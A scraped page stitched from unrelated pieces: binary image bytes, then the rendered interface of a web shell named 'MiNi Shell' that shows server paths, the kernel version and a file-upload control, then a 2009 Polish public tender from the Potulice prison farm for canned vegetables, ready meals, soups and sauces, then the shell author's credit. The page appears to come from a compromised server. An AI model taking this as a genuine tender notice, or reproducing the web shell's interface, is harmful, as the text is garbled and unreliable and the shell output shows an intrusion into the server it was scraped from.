JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115125-N-2009.html

<p class="kh_header"><b>Potulice: Dostawy warzyw i owoców przetworzonych,dań gotowych oraz zup i sosów(znak sprawy 16/2009)</b><br>
<b>Numer ogłoszenia: 115125 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Zakładzie Karnym w Potulicach , ul. Bydgoska 1, 89-120 Potulice, woj. kujawsko-pomorskie, tel. 0-52 3864168, faks 0-52 3864168.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: GOSPODARSTWO POMOCNICZE.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców przetworzonych,dań gotowych oraz zup i sosów(znak sprawy 16/2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie dotyczy dostaw warzyw i owoców przetworzonych, dań gotowych oraz zup i sosów, które zostało podzielone na 2 części (grupy).
2.Zamawiający informuje, że ilości szacunkowe artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
3.Oferowane artykuły mają być w zamkniętych i nieuszkodzonych opakowaniach.
4.Zamawiający dopuszcza możliwość dostaw artykułów w opakowaniu o większej gramaturze/litrażu (tzw. promocja) niż określone w rozdziale III siwz.
5.Zamawiający dopuszcza składanie ofert równoważnych, tzn. artykułów o innych nazwach handlowych niż określone w niniejszej siwz, pod warunkiem, że będą posiadały parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 2 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
6.Termin ważności dostarczanych artykułów, minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
7.Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1)Wykonawca dostarczać będzie artykuły do magazynu Zamawiającego zlokalizowanego na terenie Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1.
2)Wykonawca dostarczać będzie artykuły własnym transportem, na swój koszt, w sposób zapobiegający utracie walorów smakowych i odżywczych.
3)Opakowania muszą posiadać nadrukowany kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz litrażu lub gramaturze.
4)Realizacja dostaw w uzgodnionych terminach, w godzinach 8:00 - 12:00.
5)Termin płatności 30 dni, forma płatności przelew..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.80.00.00-6, 15.33.11.36-9, 15.33.11.10-1, 15.33.22.90-3, 03.21.19.00-2, 15.89.14.00-4, 15.87.12.60-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
1.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, na podstawie złożonych dokumentów oraz oświadczeń wyszczególnionych w rozdziale IX siwz.
3.Jeżeli Wykonawca nie złoży dokumentów lub oświadczeń (wyszczególnionych w rozdziale IX siwz) potwierdzających spełnienie warunków udziału w postępowaniu, albo wykonawca złoży dokumenty zawierające błędy, zamawiający wezwie wykonawcę z zastrzeżeniem art. 26 ust. 3 ustawy Pzp do ich uzupełnienia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, wykonawca składa następujące dokumenty:
1)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.Wykonawca do oferty składa podpisane oświadczenie, o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Nie dotyczy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze przy ZK w Potulicach ,ul.Bydgoska 1,89-120 Potulice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 11:00, miejsce: Gospodarstwo Pomocnicze przy ZK w Potulicach ,ul.Bydgoska 1,89-120 Potulice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) KRÓTKI OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA
a)Ogórki konserwowe, w opakowaniu szklanym (słoik) od 800g do 900g, ilość szacunkowa 860 opakowań. CPV: 15331500-2.
b)Ogórki kwaszone, w opakowaniu szklanym (słoik) od 800g do 900g, ilość szacunkowa 380 opakowań CPV: 15331000-7.
c)Kapusta kwaszona, w opakowaniu 5kg, ilość szacunkowa 26 opakowań. CPV: 15331142-4.
d)Papryka konserwowa - ćwiartki, w opakowaniu szklanym (słoik) od 600g do 700g, ilość szacunkowa 840 opakowań. CPV: 15331136-9.
e)Marchew konserwowa, w opakowaniu szklanym (słoik) od 400g do 500g, ilość szacunkowa 190 opakowań. CPV: 15331110-1.
f)Mieszanka warzywna z groszku zielonego i marchwi, w opakowaniu szklanym (słoik) od 400g do 500g, ilość szacunkowa 400 opakowań. CPV: 15331110-1.
g)Groszek konserwowy, w opakowaniu (puszka) od 350g do 450g, ilość szacunkowa 1620 opakowań. CPV: 15331462-3.
h)Fasola konserwowa czerwona, w opakowaniu (puszka) od 350g do 450g, ilość szacunkowa 540 opakowań. CPV: 15331131-4.
i)Kukurydza konserwowa, w opakowaniu (puszka) od 300g do 400g, ilość szacunkowa 2060 opakowań. CPV: 15331470-2.
j)Brzoskwinie - połówki, w opakowaniu (puszka) od 800g do 900g, ilość szacunkowa 360 opakowań. CPV: 15332100-5.
k)Ananas - plastry, w opakowaniu (puszka) od 500g do 600g, ilość szacunkowa 360 opakowań. CPV: 15332100-5.
l)Pieczarki całe marynowane, w opakowaniu szklanym (słoik) od 250g do 350g, ilość szacunkowa 120 opakowań. CPV: 15331135-2.
m)Dżem wiśniowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 150 opakowań. CPV: 15332294-1.
n)Dżem truskawkowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 150 opakowań. CPV: 15332296-5.
o)Dżem jagodowy niskosłodzony Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 180 opakowań. CPV: 15332290-3.
p)Dżem truskawkowy niskosłodzony, w opakowaniu szklanym (słoik) od 250g do 350g, ilość szacunkowa 360 opakowań. CPV: 15332296-5.
q)Dżem z czarnej porzeczki niskosłodzony, w opakowaniu szklanym (słoik) od 250g do 350g, ilość szacunkowa 240 opakowań. CPV: 15332293-4.
r)Dżem brzoskwiniowy niskosłodzony, w opakowaniu szklanym (słoik) od 250g do 350g, ilość szacunkowa 180 opakowań. CPV: 15332290-3.
s)Rodzynki sułtańskie, w opakowaniu od 90g do 110g, ilość szacunkowa 4800 opakowań. CPV: 15332412-5.
t)Pestki dyni - łuskane, w opakowaniu od 90g do 110g, ilość szacunkowa 1300 opakowań. CPV: 03211900-2.
u)Słonecznik prażony, w opakowaniu od 45g do 55g, ilość szacunkowa 1200 opakowań. CPV: 03211900-2.
v)Słonecznik łuskany, w opakowaniu od 90g do 110g, ilość szacunkowa 2400 opakowań. CPV: 03211900-2.
w)Fistaszki - orzeszki ziemne prażone niełuskane, w opakowaniu od 900g do 1000g, ilość szacunkowa 240 opakowań. CPV: 15332300-7.
x)Orzeszki ziemne smażone solone, w opakowaniu od 90g do 110g (nie w puszce), ilość szacunkowa 1200 opakowań. CPV: 15332310-0.
2) WSPÓLNY SŁOWNIK ZAMÓWIEŃ (CPV)
Główny przedmiot: 15.33.15.00-2, 15.33.10.00-7, 15.33.11.10-1, 15.33.14.62-3, 15.33.21.00-5, 15.33.11.10-1, 03.21.19.00-2
3) CZAS TRWANIA LUB TERMIN WYKONANIA
Zakończenie 31/01/2010
4) KRYTERIA OCENY OFERT
Najniższa cena.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.15.00-2, 15.33.10.00-7, 15.33.11.10-1, 15.33.14.62-3, 15.33.21.00-5, 15.33.11.10-1, 03.21.19.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) KRÓTKI OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA
a)	Pulpety z mięsa wieprzowego w sosie pomidorowym, w opakowaniu szklanym (słoik) od 450g do 550g, ilość szacunkowa 600 opakowań. CPV: 15894300-4.
a)Gołąbki w sosie pomidorowym, w opakowaniu szklanym (słoik) od 450g do 550g, ilość szacunkowa 600 opakowań, skład m.in.: mięso wieprzowo-wołowe, ryż, kapusta, itd. CPV: 15894300-4.
b)Flaki wieprzowe w sosie pomidorowyn  w opakowaniu szklanym(słoik) od 450g do 550 g,ilość szacunkowa  600 opakowań, CPV: 15894300-4
c)Fasolka po bretońsku z kiełbasą , w opakowaniu szklanym (słoik), od 450 g-550 g , ilość szacunkowa 600 opakowań,CPV: 15894300-4
d)Kotlety sojowe a la schabowe, w opakowaniu od 90g do 110g, ilość szacunkowa 1800 opakowań. CPV: 15894300-4.
e)Zupa - barszcz czerwony Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150g - 15 porcji, ilość szacunkowa 180 opakowań. Średnia wartość odżywcza w 100ml produktu po przyrządzeniu: węglowodany 4,0g, tłuszcze 0,2g, białko 0,3g, wartość energetyczna 74kJ (18kcal). CPV: 15891400-4.
f)Zupa - rosół z kury Winiary instant, doskonały smak i aromat, w opakowaniu szklanym (słoik) 150g - 30 porcji, ilość szacunkowa 180 opakowań. Średnia wartość odżywcza w 100ml produktu po przyrządzeniu: węglowodany 0,9g, tłuszcze 0,1g, białko 0,1g, wartość energetyczna 21kJ (5kcal). CPV: 15891500-4.
g)Zupa błyskawiczna z makaronem - ostra, o smaku kurczaka Vifon kurczak curry, w opakowaniu 70g, ilość szacunkowa 25200 opakowań. CPV: 15891400-4.
h)Zupa błyskawiczna (instant) pomidorowa Amino kuchnia polska, w opakowaniu 64g, ilość szacunkowa 2160 opakowań. CPV: 15891400-4.
i)Zupa - żurek z grzankami Knorr gorący kubek, w opakowaniu 17g, ilość szacunkowa 480 opakowań. CPV: 15891400-4.
j)Zupa - borowikowa z grzankami Knorr gorący kubek, w opakowaniu 16g, ilość szacunkowa 480 opakowań. CPV: 15891400-4.
k)Zupa - ogórkowa z grzankami Knorr gorący kubek, w opakowaniu 15g, ilość szacunkowa 480 opakowań. CPV: 15891400-4.
l)Zupa - rosół z kury z makaronem Knorr gorący kubek, w opakowaniu 12g, ilość szacunkowa 480 opakowań. CPV: 15891400-4.
m)Rosół z kury w kostce Knorr, w opakowaniu 6 kostek po 10g, ilość szacunkowa 540 opakowań. CPV: 15891400-4.
n)Zupa -  serowa Knorr gorący kubek, w opakowaniu 17g, ilość szacunkowa 480 opakowań. CPV: 15891400-4.

o)Sos boloński Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 540 opakowań. Średnia wartość odżywcza w 100g sosu: węglowodany przyswajalne 12,6g, tłuszcz całkowity 0,7g, białko 1,4g, wartość energetyczna 264kJ (63kcal). CPV: 15871260-4.
p)Sos słodko-kwaśny Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 540 opakowań. Średnia wartość odżywcza w 100g sosu: węglowodany przyswajalne 19,0g, tłuszcz całkowity 0,2g, białko 0,7g, wartość energetyczna 342kJ (82kcal). CPV: 15871260-4.
q)Sos meksykański Łowicz, w opakowaniu szklanym (słoik) 300g, ilość szacunkowa 540 opakowań. Średnia wartość odżywcza w 100g sosu: węglowodany przyswajalne 11,0g, tłuszcz całkowity 1,5g, białko 1,9g, wartość energetyczna 275kJ (66kcal). CPV: 15871260-4.
r)Sos bolognese z ziołami Dawtona, w opakowaniu szklanym (słoik) 425g, ilość szacunkowa 120 opakowań. CPV: 15871260-4.
s)Sos węgierski z pieczarkami Dawtona, w opakowaniu szklanym (słoik) 425g, ilość szacunkowa 120 opakowań. CPV: 15871260-4.
t)Sos meksykański Dawtona, w opakowaniu szklanym (słoik) 425g, ilość szacunkowa 120 opakowań. CPV: 15871260-4.
u)Sos czosnkowy Winiary, w opakowaniu szklanym (słoik) 250ml, ilość szacunkowa 240 opakowań. Średnia wartość odżywcza w 100g produktu: węglowodany 6,0g, tłuszcze 64,5g, białko 1,9g, wartość energetyczna 2525kJ (613kcal). CPV: 15871260-4.
v)Sos tatarski Winiary, w opakowaniu szklanym (słoik) 250ml, ilość szacunkowa 240 opakowań. Średnia wartość odżywcza w 100g produktu: węglowodany 5,8g, tłuszcze 61,9g, białko 1,3g, wartość energetyczna 2471kJ (590kcal). CPV: 15871260-4.
w)Sos pomidorowy Cykoria, w opakowaniu 50g, ilość szacunkowa 3000 opakowań. CPV: 15871260-4.
x)Sos boloński Amino kuchnia polska, w opakowaniu 43g, ilość szacunkowa 150 opakowań. CPV: 15871260-4.
2) WSPÓLNY SŁOWNIK ZAMÓWIEŃ (CPV)
Główny przedmiot: 15.89.43.00-4, 15.89.14.00-4, 15.87.12.60-4.
3) CZAS TRWANIA LUB TERMIN WYKONANIA
Zakończenie 31/01/2010
4) KRYTERIA OCENY OFERT
Najniższa cena.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4, 15.89.14.00-4, 15.87.12.60-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com